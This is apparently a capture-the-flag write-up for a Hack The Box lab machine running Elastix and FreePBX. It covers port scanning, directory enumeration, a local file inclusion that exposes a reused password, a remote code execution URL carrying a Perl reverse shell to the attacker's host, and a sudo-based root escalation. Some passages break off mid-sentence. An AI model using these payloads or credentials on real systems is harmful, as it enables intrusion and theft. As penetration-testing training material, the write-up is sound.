# Nmap 7.93 scan initiated Wed Mar 29 16:34:27 2023 as: nmap -Pn -p- -T5 -A -oN scan.txt 10.129.1.226 Nmap scan report for 10.129.1.226 Host is up (0.014s latency). Not shown: 65519 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 adee5abb6937fb27afb83072a0f96f53 (DSA) |_ 2048 bcc6735913a18a4b550750f6651d6d0d (RSA) 25/tcp open smtp? |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN 80/tcp open http Apache httpd 2.2.3 |_http-server-header: Apache/2.2.3 (CentOS) |_http-title: Did not follow redirect to https://10.129.1.226/ 110/tcp open pop3? 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 938/udp status |_ 100024 1 941/tcp status 143/tcp open imap? 443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS)) |_http-title: Elastix - Login page | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2017-04-07T08:22:08 |_Not valid after: 2018-04-07T08:22:08 |_ssl-date: 2023-03-29T20:39:13+00:00; -1s from scanner time. |_http-server-header: Apache/2.2.3 (CentOS) | http-robots.txt: 1 disallowed entry |_/ 941/tcp open status 1 (RPC #100024) 993/tcp open imaps? 995/tcp open pop3s? 3306/tcp open mysql? 4190/tcp open sieve? 4445/tcp open upnotifyp? 4559/tcp open hylafax? 5038/tcp open asterisk Asterisk Call Manager 1.1 10000/tcp open http MiniServ 1.570 (Webmin httpd) |_http-server-header: MiniServ/1.570 |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). Device type: general purpose|media device|PBX|WAP|specialized|printer|storage-misc Running (JUST GUESSING): Linux 2.6.X|2.4.X (95%), Linksys embedded (94%), Riverbed RiOS (94%), HP embedded (94%), Netgear embedded (94%), Osmosys embedded (93%), Thecus embedded (93%) OS CPE: cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:linux:linux_kernel:2.6.27 cpe:/o:linux:linux_kernel:2.4.32 cpe:/h:linksys:wrv54g cpe:/o:riverbed:rios cpe:/h:netgear:eva9100 cpe:/h:thecus:4200 cpe:/h:thecus:n5500 Aggressive OS guesses: Linux 2.6.18 (95%), Linux 2.6.27 (95%), Linux 2.6.9 - 2.6.24 (95%), Linux 2.6.9 - 2.6.30 (95%), Linux 2.6.27 (likely embedded) (95%), Linux 2.6.20-1 (Fedora Core 5) (95%), Linux 2.6.30 (95%), Linux 2.6.5 - 2.6.12 (95%), Linux 2.6.5-7.283-smp (SuSE Enterprise Server 9, x86) (95%), Linux 2.6.8 (Debian 3.1) (95%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: 127.0.0.1 Host script results: |_clock-skew: -1s TRACEROUTE (using port 8888/tcp) HOP RTT ADDRESS 1 14.50 ms 10.10.14.1 2 14.64 ms 10.129.1.226 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Mar 29 16:44:23 2023 -- 1 IP address (1 host up) scanned in 596.34 seconds
TCP/80 & TCP/443
Looking at the
TCP/80 redirects to
TCP/443. I like to start with file and web servers, so we'll start here.
Trying to Find a Server Version
I was trying to find some clever way to get the version of Elastix by checking the source code on various pages. But, the one thing I did notice is a pattern on the files when clicking through various directories. They all have a timestamp of
01-Nov-2011, which should be the original the developers pushed with the software. The other timestamps were more on
07-Apr-2017, which I guess is when the target was created.
This page here has a limited version history for Elastix and also has a date that closely aligns with the file timestamps on the server.
So, my best guess is that this server is running Elastix 2.2. The release announcement link on this page doesn't work, but I'd like to read it, as it may disclose other features about the app. I could probably use the Wayback Machine to find a copy of the page.
Checking for Potential Exploits
And, it appears that there are some public exploits available for this version of Elastix as well.
Let's enumerate some more.
gobuster dir -k -u https://10.129.1.226/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -x php,html -t 50 -o gobuster.txt
/admin (Status: 401) [Size: 2279] /configs (Status: 200) [Size: 1284] /config.php (Status: 200) [Size: 1785] /favicon.ico (Status: 200) [Size: 894] /help (Status: 200) [Size: 346] /images (Status: 200) [Size: 29900] /index.php (Status: 200) [Size: 1785] /lang (Status: 200) [Size: 4790] /libs (Status: 200) [Size: 7800] /mail (Status: 200) [Size: 2411] /modules (Status: 200) [Size: 13134] /panel (Status: 200) [Size: 1065] /recordings (Status: 200) [Size: 5194] /register.php (Status: 200) [Size: 1785] /robots.txt (Status: 200) [Size: 28] /static (Status: 200) [Size: 1278] /themes (Status: 200) [Size: 3174] /var (Status: 200) [Size: 1238]
Even when not authenticated, we are redirected to this page where we can gather additional information — like
FreePBX 126.96.36.199. It appears that this version of FreePBX could be vulnerable to the remote code execution flaw discovered above. There also appear to be additional public exploits available for this version of FreePBX.
gobuster dir -k -u https://10.129.1.226:10000 -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -x php,html -t 50 -o gobuster.txt --exclude-length 2377
5038/tcp open asterisk Asterisk Call Manager 1.1
Here's a fantastic write-up on pentesting the Asterisk Call Manager server:
Nothing too promising in the way of public exploits for this version of Asterisk.
Understanding the Exploit
Let's inspect the exploit to understand more about how it works.
- This exploit works by crafting a specific URL to the Elastix server's
/recordings/misc/callme_page.phpscript — which is a FreePBX integration with Elastix.
- Let's decode the URL to make it easier to read (the line breaks in the URL are intended):
https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n Application: system Data: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"'+str(lhost)+':'+str(lport)+'");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Looking at the technical write-up, the vulnerability occurs due to failure to sanitize user input on the "To" parameter.
The $to paramteter in recordings/misc/callmepage.php does not get sanitized. After a short trip in between various functions, $to ends up written to the Asterisk Management Interface socket.
This causes the attacker-controllerd input to be passed to the socket on the operating system where arbitray commands can be executed. In the case of this exploit, a
perlcommand is being executed to create a reverse shell back to the attacker's machine.
In the case of this exploit, we need to update these values:
rhost="target-ip-here" lhost="htb-vpn-ip-here" lport=listener-port-here extension="user-extension-here"
We're not quite ready to run the exploit yet, as we don't have a valid user extension. We can use the Local File Inclusion exploit to try and find more information, like usernames, credentials, and/or configuration files.
Let's take a look at the exploit to understand how it works. It looks like there is a PHP script that has an unsanitized parameter where an attacker can control the input by passing in a directory traversal payload and a null-byte terminator to cause the script to parse the input.
We actually don't need the Perl script to run this exploit and can easily do this using
Here is a fantastic list of various configuration files that we could try and read for some sensitive information.
I think some good files to check out would be:
After checking through some of the above files, we have some good information to go with:
- Linux user:
- The password,
jEhdIekWmdjEis repeated across multiple configuration files for various user accounts like
- Looking at the voicemail configuration, Fanis has an extension of
Testing Credentials and Running the Exploit
Using the credentials
admin:jEhdIekWmdjE, I was able to log into the Elastix admin portal. So, let's hang onto those credentials for further enumeration in the post-exploitation phase.
Remember that we needed a valid user extension for the public exploit. We were able to enumerate that using the LFI. So, let's update the exploit using the information at our disposal.
rhost="10.10.10.7" lhost"10.10.14.13" lport=443 extension="233"
OS & Kernel
Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 i686 i386 GNU/Linux CentOS release 5.6 (Final)
uid=100(asterisk) gid=101(asterisk) User asterisk may run the following commands on this host: (root) NOPASSWD: /sbin/shutdown (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/bin/yum (root) NOPASSWD: /bin/touch (root) NOPASSWD: /bin/chmod (root) NOPASSWD: /bin/chown (root) NOPASSWD: /sbin/service (root) NOPASSWD: /sbin/init (root) NOPASSWD: /usr/sbin/postmap (root) NOPASSWD: /usr/sbin/postfix (root) NOPASSWD: /usr/sbin/saslpasswd2 (root) NOPASSWD: /usr/sbin/hardware_detector (root) NOPASSWD: /sbin/chkconfig (root) NOPASSWD: /usr/sbin/elastix-helper
Users and Groups
eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:50:56:b9:18:45 brd ff:ff:ff:ff:ff:ff inet 10.10.10.7/24 brd 10.10.10.255 scope global eth0
tcp 0 0 127.0.0.1:20004 0.0.0.0:* LISTEN -
Processes and Services
root 3130 0.0 0.1 4636 1284 ? S Mar31 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid --user=mysql root 3754 0.0 1.3 19264 13660 ? Ss Mar31 0:00 /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
Interesting Scheduled Tasks
2 * * * * /var/lib/asterisk/bin/freepbx-cron-scheduler.php
- Current user crontab, no globally readable cron jobs
Looking at the output from
sudo -l as the user,
asterisk, there are multiple ways we could elevate our privilege. The
asterisk user has password-less
sudo as the
root user on multiple binaries; the most dangerous of which being
This will work, because
/bin/bash is a binary and
root is the owner of this binary. Adding the sticky bit to this binary will cause us to run it as if we are root. So, we can spawn an interactive
bash sub-process and inherit the
root user's permissions while doing so.